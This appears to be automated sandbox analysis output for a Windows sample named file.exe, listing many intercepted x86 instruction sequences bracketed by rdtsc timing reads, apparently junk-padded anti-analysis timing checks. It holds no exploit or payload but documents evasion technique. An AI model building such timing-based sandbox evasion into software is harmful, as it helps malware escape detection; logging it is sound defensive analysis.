Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125019D second address: 12501AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007FEE1472CB56h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12501AA second address: 12501B0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B690E second address: 11B691A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B691A second address: 11B6920 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B6920 second address: 11B6924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B6924 second address: 11B692A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124EF4D second address: 124EF59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FEE1472CB56h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124F0A9 second address: 124F0AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124F384 second address: 124F38A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124FE13 second address: 124FE24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124FE24 second address: 124FE28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124FE28 second address: 124FE2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12557BE second address: 12557C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12557C4 second address: 12557CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12557CA second address: 12557CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125594F second address: 1255978 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1507F276h 0x00000007 jmp 00007FEE1507F26Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1255978 second address: 1255994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FEE1472CB56h 0x0000000a popad 0x0000000b pop ebx 0x0000000c jnp 00007FEE1472CB6Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007FEE1472CB56h 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1256676 second address: 125667C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125694E second address: 1256954 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1256F32 second address: 1256F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1256F36 second address: 1256F3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1256F3E second address: 1256F4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FEE1507F266h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1256F4A second address: 1256F5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1472CB5Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1256F5C second address: 1256F82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FEE1507F274h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1256F82 second address: 1256F88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1256F88 second address: 1256F9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEE1507F270h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125726A second address: 125726E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125726E second address: 1257287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FEE1507F26Fh 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1257287 second address: 125728D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125728D second address: 125729D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FEE1507F266h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125729D second address: 12572DC instructions: 0x00000000 rdtsc 0x00000002 jc 00007FEE1472CB56h 0x00000008 jg 00007FEE1472CB56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FEE1472CB67h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FEE1472CB62h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12572DC second address: 12572F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1507F278h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12572F8 second address: 125731A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1472CB68h 0x00000007 js 00007FEE1472CB5Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125DC69 second address: 125DC81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEE1507F274h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125DC81 second address: 125DCCD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FEE1472CB63h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edi 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FEE1472CB63h 0x00000016 je 00007FEE1472CB56h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 pop eax 0x00000021 jmp 00007FEE1472CB5Fh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125D123 second address: 125D129 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125D536 second address: 125D550 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1472CB65h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125D7E2 second address: 125D7E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1268C3E second address: 1268C42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1268C42 second address: 1268C59 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007FEE1507F26Bh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1268F45 second address: 1268F49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1268F49 second address: 1268F6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007FEE1507F26Eh 0x0000000f push esi 0x00000010 pop esi 0x00000011 js 00007FEE1507F266h 0x00000017 pushad 0x00000018 push edx 0x00000019 pop edx 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c pushad 0x0000001d popad 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12690C7 second address: 12690D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FEE1472CB56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12690D1 second address: 12690D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12690D5 second address: 12690DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12690DF second address: 12690E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12693BE second address: 12693C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1271E12 second address: 1271E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1274366 second address: 127436A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127436A second address: 127436E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12741A7 second address: 12741AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12741AB second address: 12741CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEE1507F276h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12741CB second address: 12741E9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEE1472CB56h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007FEE1472CB5Ah 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jns 00007FEE1472CB56h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12741E9 second address: 1274218 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1507F273h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f jg 00007FEE1507F266h 0x00000015 jmp 00007FEE1507F26Bh 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1274218 second address: 127423C instructions: 0x00000000 rdtsc 0x00000002 jp 00007FEE1472CB58h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007FEE1472CB65h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12788D9 second address: 12788E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12788E1 second address: 12788ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FEE1472CB56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1278A49 second address: 1278A62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FEE1507F273h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127BA2E second address: 127BA76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEE1472CB60h 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007FEE1472CB63h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FEE1472CB67h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127BA76 second address: 127BA7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127BA7A second address: 127BA80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1289032 second address: 1289045 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEE1507F26Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1297A5F second address: 1297A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1297A65 second address: 1297A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FEE1507F26Ah 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1297A74 second address: 1297A7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FEE1472CB56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1297A7E second address: 1297AA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1507F272h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jc 00007FEE1507F270h 0x00000017 push edi 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129A1C4 second address: 129A1CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129A1CE second address: 129A1D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129A1D7 second address: 129A1EE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FEE1472CB5Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129A1EE second address: 129A1F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129A1F4 second address: 129A206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FEE1472CB5Dh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A0948 second address: 12A094C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A094C second address: 12A0952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A7E3B second address: 12A7E53 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FEE1507F26Ch 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A670E second address: 12A6712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A6712 second address: 12A6736 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1507F275h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007FEE1507F276h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A6B94 second address: 12A6BB5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FEE1472CB6Ch 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FEE1472CB64h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A6FD7 second address: 12A7004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FEE1507F26Ch 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 jmp 00007FEE1507F270h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A7004 second address: 12A7011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007FEE1472CB56h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12A7BB0 second address: 12A7BBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FEE1507F266h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AA234 second address: 12AA239 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AD2ED second address: 12AD34C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pushad 0x00000006 popad 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007FEE1507F271h 0x00000012 js 00007FEE1507F266h 0x00000018 popad 0x00000019 jmp 00007FEE1507F279h 0x0000001e popad 0x0000001f pushad 0x00000020 jmp 00007FEE1507F26Fh 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FEE1507F26Eh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AD34C second address: 12AD350 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12ACFFD second address: 12AD001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12AD001 second address: 12AD00D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEE1472CB56h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12CE92F second address: 12CE935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12CE935 second address: 12CE946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FEE1472CB56h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d push ecx 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12CE946 second address: 12CE971 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007FEE1507F266h 0x0000000b jmp 00007FEE1507F276h 0x00000010 popad 0x00000011 pushad 0x00000012 ja 00007FEE1507F266h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12CE4C0 second address: 12CE503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jo 00007FEE1472CB56h 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FEE1472CB62h 0x00000018 jmp 00007FEE1472CB66h 0x0000001d popad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12CE503 second address: 12CE50D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FEE1507F266h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12CE50D second address: 12CE51D instructions: 0x00000000 rdtsc 0x00000002 js 00007FEE1472CB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E6937 second address: 12E6979 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007FEE1507F26Eh 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e jo 00007FEE1507F266h 0x00000014 jmp 00007FEE1507F275h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push edi 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 pop eax 0x00000023 pop edi 0x00000024 push ecx 0x00000025 push eax 0x00000026 pop eax 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E6979 second address: 12E697E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E697E second address: 12E69A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEE1507F26Eh 0x00000009 jmp 00007FEE1507F271h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E6B2A second address: 12E6B31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E6B31 second address: 12E6B36 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
